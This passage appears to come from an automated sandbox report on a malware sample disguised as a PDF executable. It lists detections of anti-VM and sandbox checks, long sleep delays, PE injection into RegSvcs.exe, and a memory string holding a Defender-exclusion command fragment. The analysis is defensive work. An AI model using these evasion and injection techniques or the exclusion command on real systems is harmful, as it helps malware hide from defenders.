                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      Yara detected AntiVM3
                      Source: Yara matchFile source: 0.2.20220114080343434.pdf.exe.2daf808.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.20220114080343434.pdf.exe.2db7814.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.312248426.0000000002D81000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.312683612.0000000002E79000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 20220114080343434.pdf.exe PID: 4616, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.312248426.0000000002D81000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000002.312683612.0000000002E79000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.312248426.0000000002D81000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000002.312683612.0000000002E79000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exe TID: 4060Thread sleep time: -40740s >= -30000s
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exe TID: 5832Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2444
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7407
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeThread delayed: delay time: 40740
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.312683612.0000000002E79000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.312683612.0000000002E79000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.312683612.0000000002E79000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.312683612.0000000002E79000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017FC148 LdrInitializeThunk,
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      Writes to foreign memory regions
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 438000
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43A000
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1152008
                      Allocates memory in foreign processes
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                      Injects a PE file into a foreign process
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                      Source: RegSvcs.exe, 00000008.00000002.556131473.0000000001D70000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: RegSvcs.exe, 00000008.00000002.556131473.0000000001D70000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: RegSvcs.exe, 00000008.00000002.556131473.0000000001D70000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: RegSvcs.exe, 00000008.00000002.556131473.0000000001D70000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Users\user\Desktop\20220114080343434.pdf.exe VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
